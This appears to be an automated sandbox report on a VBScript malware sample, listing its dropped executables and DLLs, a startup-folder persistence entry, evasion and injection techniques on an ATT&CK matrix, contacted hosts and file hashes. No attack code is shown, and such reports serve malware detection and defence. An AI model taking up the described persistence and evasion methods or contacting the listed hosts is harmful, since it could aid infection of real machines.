Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE98780 _ZTSNSt6thread5_ImplISt12_Bind_simpleIFPFvvEvEEEE,_ZTSSt16_Sp_counted_baseILN9__gnu_cxx12_Lock_policyE2EE,_ZTSSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFvvEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE,	14_2_6DE98780
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE98740 _ZTSNSt6thread5_ImplISt12_Bind_simpleIFPFivEvEEEE,_ZTSSt16_Sp_counted_baseILN9__gnu_cxx12_Lock_policyE2EE,_ZTSSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFvvEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE,	14_2_6DE98740
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE9870C _ZTSNSt6thread10_Impl_baseE,_ZTSSt16_Sp_counted_baseILN9__gnu_cxx12_Lock_policyE2EE,_ZTSSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFvvEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE,	14_2_6DE9870C
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE986E4 _ZTSN7Gdiplus5ImageE,_ZTSN7Gdiplus6BitmapE,_ZTSSt16_Sp_counted_baseILN9__gnu_cxx12_Lock_policyE2EE,_ZTSSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFvvEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE,	14_2_6DE986E4
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE986E4 _ZTSN7Gdiplus5ImageE,_ZTSN7Gdiplus6BitmapE,_ZTSSt16_Sp_counted_baseILN9__gnu_cxx12_Lock_policyE2EE,_ZTSSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFvvEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE,	14_2_6DE986E4
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE986C0 _ZTISt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFvvEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE,	14_2_6DE986C0
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE94EB0 _ZNSt6threadC1IRFvvEIEEEOT_DpOT0_,_Znwj,_ZNSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFvvEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE14_M_get_deleterERKSt9type_info,_ZNSt6thread15_M_start_threadESt10shared_ptrINS_10_Impl_baseEE,	14_2_6DE94EB0
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE986B4 _ZTISt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFivEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE,	14_2_6DE986B4
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE9868C _ZTINSt6thread5_ImplISt12_Bind_simpleIFPFvvEvEEEE,	14_2_6DE9868C
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE98680 _ZTINSt6thread5_ImplISt12_Bind_simpleIFPFivEvEEEE,	14_2_6DE98680
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE989E0 _ZTVNSt6thread5_ImplISt12_Bind_simpleIFPFvvEvEEEE,	14_2_6DE989E0
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE989F8 _ZTVSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFivEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE,	14_2_6DE989F8
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE986E4 _ZTSN7Gdiplus5ImageE,_ZTSN7Gdiplus6BitmapE,_ZTSSt16_Sp_counted_baseILN9__gnu_cxx12_Lock_policyE2EE,_ZTSSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFvvEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE,	14_2_6DE986E4
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE986E4 _ZTSN7Gdiplus5ImageE,_ZTSN7Gdiplus6BitmapE,_ZTSSt16_Sp_counted_baseILN9__gnu_cxx12_Lock_policyE2EE,_ZTSSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFvvEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE,	14_2_6DE986E4
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE98880 _ZTSSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFivEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE,_ZTSSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFvvEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE,	14_2_6DE98880
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE98840 _ZTSSt19_Sp_make_shared_tag,_ZTSSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFvvEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE,	14_2_6DE98840
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE986E4 _ZTSN7Gdiplus5ImageE,_ZTSN7Gdiplus6BitmapE,_ZTSSt16_Sp_counted_baseILN9__gnu_cxx12_Lock_policyE2EE,_ZTSSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFvvEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE,	14_2_6DE986E4
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE94BE0 _ZNSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFivEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE10_M_disposeEv,	14_2_6DE94BE0
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE94BF0 _ZNSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFivEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE14_M_get_deleterERKSt9type_info,_ZNKSt9type_infoeqERKS_,	14_2_6DE94BF0
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE94BD0 _ZNSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFivEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE10_M_destroyEv,_ZdlPv,	14_2_6DE94BD0
Source: C:\Users\user\Service\Discord .exe	Code function: 14_2_6DE98A18 _ZTVSt23_Sp_counted_ptr_inplaceINSt6thread5_ImplISt12_Bind_simpleIFPFvvEvEEEESaIS7_ELN9__gnu_cxx12_Lock_policyE2EE,	14_2_6DE98A18

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	111 Windows Management Instrumentation	2 Registry Run Keys / Startup Folder	1 Process Injection	11 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	221 Scripting	Boot or Logon Initialization Scripts	2 Registry Run Keys / Startup Folder	221 Scripting	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	1 Email Collection	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Native API	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	26 System Information Discovery	SMB/Windows Admin Shares	1 Clipboard Data	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 Exploitation for Client Execution	Logon Script (Mac)	Logon Script (Mac)	1 Masquerading	NTDS	21 Security Software Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	21 Virtualization/Sandbox Evasion	LSA Secrets	21 Virtualization/Sandbox Evasion	SSH	Keylogging	Data Transfer Size Limits	3 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Process Injection	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Link
My_Lover.vbs	0%	ReversingLabs
My_Lover.vbs	0%	Virustotal	Browse
My_Lover.vbs	0%	Metadefender	Browse

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\Service\DPUB1.dll	0%	ReversingLabs
C:\Users\user\Service\DPUB1.dll	0%	Virustotal	Browse
C:\Users\user\Service\DRES1.dll	0%	ReversingLabs
C:\Users\user\Service\DRES1.dll	0%	Virustotal	Browse
C:\Users\user\Service\DSER1.dll	0%	ReversingLabs
C:\Users\user\Service\DSER1.dll	0%	Virustotal	Browse
C:\Users\user\Service\Discord .exe	0%	ReversingLabs
C:\Users\user\Service\libcrypto-3.dll	0%	ReversingLabs
C:\Users\user\Service\libgcc_s_dw2-1.dll	0%	ReversingLabs
C:\Users\user\Service\libgcc_s_dw2-1.dll	0%	Metadefender	Browse
C:\Users\user\Service\libssl.dll	0%	ReversingLabs
C:\Users\user\Service\libstdc++-6.dll	0%	ReversingLabs
C:\Users\user\Service\libstdc++-6.dll	0%	Metadefender	Browse
C:\Users\user\Service\libwinpthread-1.dll	0%	ReversingLabs
C:\Users\user\Service\libwinpthread-1.dll	0%	Metadefender	Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
c1-wi.neocities.org	198.51.233.2	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://c1-wi.neocities.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://t.co/XlenJSiON3	Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	false	high
https://t.co/RrhqhXOlLE	Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqa2hGTFViSm9jbmVadVBrdE1hcHFsMVN6SUNsQXxB	Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	false	high
https://t.co/CdOqLONoRi	Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	false	high
https://t.co/uNCapZTROn	Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqa3dhdGNROTd0dTdCd05uSVAyMGVmdWVQVWd4UXxB	Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbm9xWW84NXlwekxYVzJWNEczYmI0VkpTcWhRQXxB	Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	false	high
https://t.co/GzOeLXftEP	Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	false	high
https://t.co/FkIvPMf8lS	Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	false	high
https://t.co/ef9DhWRC22	Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	false	high
https://t.co/Z6zebveHUm	Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbUo2U1o4VFBhcmZpRVFtVHdFSXNPbkt6MU9GQXxB	Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbWpRcEhINFp5a09mUzk5ckg0X2pNZFlpSTJGUXxB	Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbjFXRGN2VlNHQnVSNE01OTFMVmVDdVowVE5vQXxB	Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	false	high
https://t.co/dyNTsIXnAp	Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqblNrbHBMZEtacGlLcDVHNEJZNXVPZnVVTXB1d3xB	Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	false	high
https://t.co/QRzQHZaNqc	Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbGRvb3d6MDRMZXQ4T1B4c1RxZE4zXzUtSTJsd3xB	Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbHVtYWlCZVdXc0kyWnhwMzlrYndDT0E5clZRQXxB	Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	false	high
https://t.co/Wz0b3hK7Zn	Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	false	high
https://t.co/K9rbut2RUz	Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqbEdtU1dsZlktbHowRC1TbUVqdGItY1Y3TGluQXxB	Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.youtube.com/redirect?event=&redir_token=QUFFLUhqblZycFpnMU1pMlJBekIyY3YyaDlYTDh3ZjZJd3xB	Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.youtube.com/redirect?event=&redir_token=QUF	Discord .exe, 00000010.00000003.735695645.0000000004062000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
198.51.233.2	c1-wi.neocities.org	United States		395409	NEOCITIESUS	false
91.109.178.2	unknown	France		29075	IELOIELOMainNetworkFR	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	738336
Start date and time:	2022-11-04 19:55:01 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	My_Lover.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal64.evad.winVBS@6/18@1/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 16.3% (good quality ratio 10.8%) Quality average: 49.9% Quality standard deviation: 40.9%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 159
Cookbook Comments:	Found application associated with file extension: .vbs Override analysis time to 240s for JS/VBS files not yet terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 8.248.145.254, 8.241.126.121, 67.26.81.254, 8.248.147.254, 67.26.75.254, 173.222.108.210, 173.222.108.226
Excluded domains from analysis (whitelisted): www.bing.com, fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net
Execution Graph export aborted for target Discord .exe, PID 2788 because there are no executed function
Execution Graph export aborted for target Discord .exe, PID 5428 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:56:10	API Interceptor	1x Sleep call for process: wscript.exe modified
19:59:30	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\V3.lnk
19:59:40	API Interceptor	272x Sleep call for process: Discord .exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
198.51.233.2	https://oregonlegalteam.preview.softr.app/?t=1654875264603__;!!EhqYCQ!aI7tCi4GFQYTw0oLy2so8c2u2lS0VlheiJD2Njp7CGhbCPQfqethENnP9D-T7AHGSaXq7bFFTaCiHzWK0A$	Get hash	malicious	Browse
198.51.233.2	http://www.elib.upm.edu.my/cgi-bin/koha/tracklinks.pl?uri=http%3A%2F%2Fvibrerant-tesola-8rd2a7r.netlify.app#mark.rajkowski@xyleminc.com\|#\|#&biblionumber=214681	Get hash	malicious	Browse
91.109.178.2	BpSYIxqfGd.exe	Get hash	malicious	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
IELOIELOMainNetworkFR	kGbFwAcsTh.exe	Get hash	malicious	Browse	91.109.182.9
	nPSC2jINrP.exe	Get hash	malicious	Browse	141.255.153.28
	assync.ps1	Get hash	malicious	Browse	91.109.180.5
	oF8XCV5CSr.exe	Get hash	malicious	Browse	91.109.182.12
	L9dc5gBDk1.exe	Get hash	malicious	Browse	141.255.158.22
	6zayKbpyvh.exe	Get hash	malicious	Browse	91.109.184.6
	SHrhw8iJez.exe	Get hash	malicious	Browse	141.255.147.75
	cVDLtBpIIk.exe	Get hash	malicious	Browse	91.109.184.6
	VafrgSskRm.exe	Get hash	malicious	Browse	91.109.182.4
	HE0uiLgce0.exe	Get hash	malicious	Browse	91.109.186.14
	W4myOXfPXc.exe	Get hash	malicious	Browse	141.255.158.120
	US8orhoBbN.exe	Get hash	malicious	Browse	91.109.182.10
	68791C09A9C19E799CDA276D13ADF1677EE2A24F1DCE3.exe	Get hash	malicious	Browse	91.109.188.7
	99273154C07A76B475EF1CFA816F021631BAAFDD93F32.exe	Get hash	malicious	Browse	141.255.158.190
	1KwypguqwJ.exe	Get hash	malicious	Browse	91.109.186.2
	r8YIIQOQfO.exe	Get hash	malicious	Browse	91.109.178.4
	Am16bX4TwU.exe	Get hash	malicious	Browse	91.109.188.15
	ORZaBBgsf5.exe	Get hash	malicious	Browse	91.109.186.5
	JPjX6Idwve.exe	Get hash	malicious	Browse	141.255.152.251
	7E00B2F55E86F4EC8DF7F75D4038C1978CB8EF8A20ED3.exe	Get hash	malicious	Browse	141.255.146.249
NEOCITIESUS	https://oregonlegalteam.preview.softr.app/?t=1654875264603__;!!EhqYCQ!aI7tCi4GFQYTw0oLy2so8c2u2lS0VlheiJD2Njp7CGhbCPQfqethENnP9D-T7AHGSaXq7bFFTaCiHzWK0A$	Get hash	malicious	Browse	198.51.233.2
NEOCITIESUS	http://www.elib.upm.edu.my/cgi-bin/koha/tracklinks.pl?uri=http%3A%2F%2Fvibrerant-tesola-8rd2a7r.netlify.app#mark.rajkowski@xyleminc.com\|#\|#&biblionumber=214681	Get hash	malicious	Browse	198.51.233.2

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 62919 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	62919
Entropy (8bit):	7.995280921994772
Encrypted:	true
SSDEEP:	1536:d+OfVxHl7Wyf11lYom3xQcRVOtPHwQV4rP6Ji7:d+OxHxJlZcuPt4b6q
MD5:	3DCF580A93972319E82CAFBC047D34D5
SHA1:	8528D2A1363E5DE77DC3B1142850E51EAD0F4B6B
SHA-256:	40810E31F1B69075C727E6D557F9614D5880112895FF6F4DF1767E87AE5640D1
SHA-512:	98384BE7218340F95DAE88D1CB865F23A0B4E12855BEB6E74A3752274C9B4C601E493864DB777BCA677A370D0A9DBFFD68D94898A82014537F3A801CCE839C42
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF............,...................I.......Q.........GU.\ .authroot.stl..O..5..CK..<Tk...c_.d....A.K...+.d.-;%.BJII!.QIR..$t)Kd.-QQ...g......^..~\|N=...y....{. .4{...W....b.i...j.I.......1:..b\.0.....Ait.2t......w.%.&.",tL_...4.8L[G..;.57....AT.k.......V..K......(....mzS...G....r.".=H.?>.........x&...S%....X.M^..j...A..x.9`.9...A../.s..#.4#.....Id.w..B....s.8..(...dj....=L.)..s.d.]NxQX8....stV#.K.'7.tH..9u~.2..!..2./.....!..9C../...mP $..../y.....@p.6.}.`...5. 0r.w...@(.. .Q....)g.........m..z.8rR..).].T9r<.L....0..`.........c.....;-.g..;.wk.)......i..c5.....{v.u...AS..=.....&.:.........+..P.N..9..EAQ.V.$s.......B.`.Mfe..8.......$...y-.q9J........W...2.Q8...O.......i..@\^.=X..dG$.M..#=....m.h..{9.'...-.v..Z...!....z.....N....i..^..,........d...%Xa~q.@D\|0...Y.m...........&d.4..A..{t=...../.t.3._.....?-.....uroP?.d.Z..S..{...$.i....X..$.O..4..N.)....U.Z..P....X,.... ...Lg..35..W..s.!c...Ap.].P..8..M..W.......U..,...m.u..\|=.m1..~..!..b...._.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.0963408716428216
Encrypted:	false
SSDEEP:	6:kKpN/7N1HlNiN+SkQlPlEGYRMY9z+4KlDA3RUeKlTAlWRyf1:LB/kPlE99SNxAhUexYo1
MD5:	53A793879F3A952FEDFBC68EB16EE3DD
SHA1:	B4F58104D6FBC81F67A04DC0A02C3CD4C081BFEB
SHA-256:	8507664D7021BA281D4E14890544A11C8C03DA09807C6EF8E42E24A6C897F287
SHA-512:	5116EE145F004BC03514FA36558891AD1D950022B26B4F7A4F813BFC774B70817ED9A8AD19FB0E6E76D228C4E551A6F09E6AAE06C3F07E93A95A785A7442B4E0
Malicious:	false
Reputation:	low
Preview:	p...... ........(.^(....(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.d.e.4.d.3.9.b.e.8.d.8.1.:.0."...

C:\Users\user\AppData\Local\Temp\8901m.jpg

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 682x802, components 3
Category:	dropped
Size (bytes):	50518
Entropy (8bit):	7.863636843026908
Encrypted:	false
SSDEEP:	1536:iSZvqDlmczFPuHu9tA9AA3a+T/ahTwo6rx:pdCTpzrA3h2EB
MD5:	97B5AAC67F297DE78D657659098222F3
SHA1:	7F36BEA6A6DE9127D0F91E949C31308DE867991D
SHA-256:	873595042EC99DD769719A436C2639356E19E2839675B77ECF55F7139229F01A
SHA-512:	2D169C1D2CC14C4B8819D72CCDA9D8A26B3701992F012489C7EFD35416E359A702D0C30D0F6BFF6C9BFF1392D57336AD71ED4987F58D6E0926F9B10AC489A5D4
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......"...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....u&8.^..(.4QH.............1.K.(.3E.1..)1KE .(...JZ(........b..8......(...J_.(....b..(.....(.....h..(.(.......d..]..od.....L.2...~~...E.N...b..(.QE..QE-.%.b.P.f.R.@.KE....Q@.%.P.zsF9......b..LP)H...1E...J)i(......Z)(.h..@..Q@..Q@..SO...:..<.QHI.....n.wq..8=(. .0..)A.^..w.....S......:QE-..QE..QE....P.R.E.%..P.E.P.R.E.&)h....Z(.(....JZJ.Z(....Z(...(.......)h

C:\Users\user\AppData\Local\Temp\a.zip

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	962
Entropy (8bit):	7.624940106927298
Encrypted:	false
SSDEEP:	24:9gnQe/h9b3tK6A/AzcijpiAk34o71HNU6H8X:9gn5R3tVXzdiAHo71tU6H8X
MD5:	6117861AD37E5836920C910CCEA02644
SHA1:	0980005CFC6EA75E0A6C3C4B4EBE88B75F987A6D
SHA-256:	BF007CE11C0182D409DEAF64D6745235100354B30E7AA700C195494B52911305
SHA-512:	FFFFF2C8C64F33BEDDD9B8C7B53774B4AB42D59F48228C623831453601F649655CBD04014E98D564DA6A00915FB55427E1908D8303EC1D63C02E4275F2AE0E02
Malicious:	false
Yara Hits:	Rule: SUSP_ZIP_LNK_PhishAttachment_Pattern_Jun22_1, Description: Detects suspicious tiny ZIP files with phishing attachment characteristics, Source: C:\Users\user\AppData\Local\Temp\a.zip, Author: Florian Roth
Preview:	PK..........^S..:4T...........V3.lnk.UkH.Q.~..Y^f-.a.....6.!:wq.8.c....5me....EY.h8.L)....G.!%..QV?.av%..~iJD..9.....,z?.sy.9......~.D$S...A.$Ks.<R.1..~;..3.../.X.S......2..5.4.5.(.K....!{.]..8....r...pw.}.3..u.t`..u.3F...j.!...D.^d+......5n...je......%....W...}.^...3tg....Y.J!...1h.ft3.T......:..E^.!79..gS.%..Y..."S.g....k..f..Y.GZ..>....P2.U.....#.ZX.....{.:X.5@.P.DI..G2.......W..V...I1m+.x.3..SS..U...R.x.[pz..UZW..G.'%.../......"X<....3....,..f..F.yQ..q3S...6.P....x..._.....IH.M=....\|.Q.{/...ddS.D3.+%.Iw.Kk...1.K........S....}.a..b5cQ.n..s..=...9!...T..r.u.^..1...E.B.d/.?H,....%....T.OFJ.u.#..1....m......$.o..[..S........`..!~....)M.$..b........i(..D.7@...F.5.&E.%...&.\|:........u.D.R..!.........;3.H......l0..=?.....a$...P...zzOl.@U.....C.A...E.).z..).....9s..Ng\|F.p..4h{..Q..+...?...?..g.....&......_......mb;..&X....1.....*=.n'..PK............^S..:4T................. .......V3.lnkPK..........4...x.....

C:\Users\user\AppData\Local\Temp\x.zip

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	2307521
Entropy (8bit):	7.997609836589566
Encrypted:	true
SSDEEP:	49152:ADhApSgSD3s7vChh8PIyUlDHXAt3kiEp9UrRxsPwq:mhApSDDOvC/iIhlDHq3NEpmFxsPwq
MD5:	E058DCDFA98EC4C4E0485AF36E391F47
